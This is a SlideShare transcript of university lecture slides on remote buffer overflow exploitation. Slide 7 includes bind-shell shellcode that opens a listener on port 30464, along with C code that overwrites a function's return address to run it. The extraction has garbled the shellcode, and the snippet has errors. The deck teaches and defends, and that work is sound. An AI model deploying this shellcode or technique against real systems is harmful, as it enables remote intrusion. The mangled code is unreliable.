Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Remote Buffer Overflows


    Network Security 
           vs. 
  Software Engineering




      David Klassen
Legal Obstacles to Awareness

Is it lawful to demonstrate security vulnerabilities
in non-corporate software?

For compute...
Corporate Software Paradigm
Typical Industry Tasks (1999):
  Architecture and Design
  Construction and Release (Code Revi...
Computing Knowledge/History

Volumes of computer related data / standards

Is teaching students everything possible?

Desk...
Ctrl Oct    Dec   Hex    Char            Oct Dec    Hex   Char
 ----------------------------------------------------------...
An assembler course will
teach you the basics about a
program in memory (globals
vs. functions).

How can we make a local
...
The following code places some carefully
designed assembler code in the proper location:
   // Summarized Assembler code t...
How about remote network
exploits, how does it work?

Easiest case we provide the as-
sembler code in the data sent.

RA o...
The program is loaded into
the top section of the stack
closest to: 0xbfffffff

Presuming the buffer over-
flow does not c...
Preventative Procedures


Ways to prevent unwanted security breeches:

  Stay aware of all exploits not just BO.
  Proof y...
Questions
References
Pothamsetty, V. 2005. Where security education is lacking. In Proceedings of the 2nd Annual
    Conference on i...
Upcoming SlideShare
Loading in …5
×

Buffer Overflows Presentation

1,932 views

Published on

I gave a practical demonstration and lecture of this presentation to the students in my class at BCIT.

  • Be the first to comment

  • Be the first to like this

Buffer Overflows Presentation

  1. 1. Remote Buffer Overflows Network Security  vs.  Software Engineering David Klassen
  2. 2. Legal Obstacles to Awareness Is it lawful to demonstrate security vulnerabilities in non-corporate software? For computer professionals this is essential info. While it may not be pretty, the study of flawed and incorrect designs are essential. Like any other industry, studying the effects of poor design improves our fore-sight (ie. Civil).
  3. 3. Corporate Software Paradigm Typical Industry Tasks (1999): Architecture and Design Construction and Release (Code Review) White and Black Box Tests Load, Performance, Stress Tests Automated and Manual User Testing Admittedly brute force/trash testing was not popular. Security Bugs found by Network Associates etc. Do these activities encompass security analysis? Immersion in Security paradigm needed? Penetration Testing, Exploit Research etc.
  4. 4. Computing Knowledge/History Volumes of computer related data / standards Is teaching students everything possible? Desktop short-cut keys (documentation, J. Clark) Where security education is lacking (Core, V. P.) 96 characters of possible 256 (28) are clearly rep- resented on the typical keyboard (37.5%).
  5. 5. Ctrl Oct Dec Hex Char Oct Dec Hex Char ------------------------------------------------------------ ^@ 000 0 00 NUL ’0’ 100 64 40 @ ^a 001 1 01 SOH 101 65 41 A ^b 002 2 02 STX 102 66 42 B ^c 003 3 03 ETX 103 67 43 C ^d 004 4 04 EOT 104 68 44 D ^e 005 5 05 ENQ 105 69 45 E ^f 006 6 06 ACK 106 70 46 F ^g 007 7 07 BEL ’a’ 107 71 47 G ^h 010 8 08 BS ’b’ 110 72 48 H ^i 011 9 09 HT ’t’ 111 73 49 I ^j 012 10 0A LF ’n’ 112 74 4A J ^k 013 11 0B VT ’v’ 113 75 4B K ^l 014 12 0C FF ’f’ 114 76 4C L ^m 015 13 0D CR ’r’ 115 77 4D M ^n 016 14 0E SO 116 78 4E N ^o 017 15 0F SI 117 79 4F O ^p 020 16 10 DLE 120 80 50 P ^q 021 17 11 DC1 121 81 51 Q ^r 022 18 12 DC2 122 82 52 R ^s 023 19 13 DC3 123 83 53 S ^t 024 20 14 DC4 124 84 54 T ^u 025 21 15 NAK 125 85 55 U ^v 026 22 16 SYN 126 86 56 V ^w 027 23 17 ETB 127 87 57 W ^x 030 24 18 CAN 130 88 58 X ^y 031 25 19 EM 131 89 59 Y ^z 032 26 1A SUB 132 90 5A Z ^[ 033 27 1B ESC 133 91 5B [ ^ 034 28 1C FS 134 92 5C ’’ ^] 035 29 1D GS 135 93 5D ] ^^ 036 30 1E RS 136 94 5E ^ ^_ 037 31 1F US 137 95 5F _ 040 32 20 SPACE 140 96 60 `
  6. 6. An assembler course will teach you the basics about a program in memory (globals vs. functions). How can we make a local exploit force the computer to do what we want? The Key is in the function Return Address (ie. stat.c).
  7. 7. The following code places some carefully designed assembler code in the proper location: // Summarized Assembler code to create a listener on port 30464 char shellcode8[] = quot;x31xc0xb0x02xcdx80x85xc0x75x43xebx43x5ex31xc0quot; quot;x31xdbx89xf1xb0x02x89x06xb0x01x89x46x04xb0x06quot; quot;x89x46x08xb0x66xb3x01xcdx80x89x06xb0x02x66x89quot; quot;x46x0cxb0x77x66x89x46x0ex8dx46x0cx89x46x04x31quot; quot;xc0x89x46x10xb0x10x89x46x08xb0x66xb3x02xcdx80quot; quot;xebx04xebx55xebx5bxb0x01x89x46x04xb0x66xb3x04quot; quot;xcdx80x31xc0x89x46x04x89x46x08xb0x66xb3x05xcdquot; quot;x80x88xc3xb0x3fx31xc9xcdx80xb0x3fxb1x01xcdx80quot; quot;xb0x3fxb1x02xcdx80xb8x2fx62x69x6ex89x06xb8x2fquot; quot;x73x68x2fx89x46x04x31xc0x88x46x07x89x76x08x89quot; quot;x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31quot; quot;xc0xb0x01x31xdbxcdx80xe8x5bxffxffxffquot;; void bar (void) { int *ret; // The very first function variable. ret = (int *)&ret + 2; // Change address of pointer to Return Address (RA). (*ret) = (int)shellcode8; // Alter data a location pointed to by RA return 0; } } We had to alter the code to make this possible but, every buffer overflow uses the same basics.
  8. 8. How about remote network exploits, how does it work? Easiest case we provide the as- sembler code in the data sent. RA of the function that contains the BO condition, is approxi- mated by numerous NOPs . NOPs perform nothing so, when program execution hits our c0de the port listener starts.
  9. 9. The program is loaded into the top section of the stack closest to: 0xbfffffff Presuming the buffer over- flow does not crash the pro- gram (as in the demo). A repetitive script can start by guessing a high RA and work down (BForceTest.pl) In pre-compiled executables BO addresses are easier.
  10. 10. Preventative Procedures Ways to prevent unwanted security breeches: Stay aware of all exploits not just BO. Proof your code for usages of vulnerable prac- tices (Last weeks lecture). Stay interested in BruteForce/Trash testing. Re-compile executables on each machine. seLinux, LIDS, GRSecurity, PaX, Propolice
  11. 11. Questions
  12. 12. References Pothamsetty, V. 2005. Where security education is lacking. In Proceedings of the 2nd Annual Conference on information Security Curriculum Development (Kennesaw, Georgia, September 23 - 24, 2005). InfoSecCD '05. ACM Press, New York, NY, 54-58. DOI= http://0-doi.acm.org.innopac.lib.bcit.ca:80/10.1145/1107622.1107635 Blomgren, Michel. Introduction to Shellcoding: How to exploit buffer overflows, tigerteam.se. Advanced Ethical Hacking Course Documentation. 2004. Retrieved November 1, 2006 from the World Wide Web: http://tigerteam.se/dl/papers/intro_to_shellcoding.pdf www.metaploit.com www.milw0rm.org

×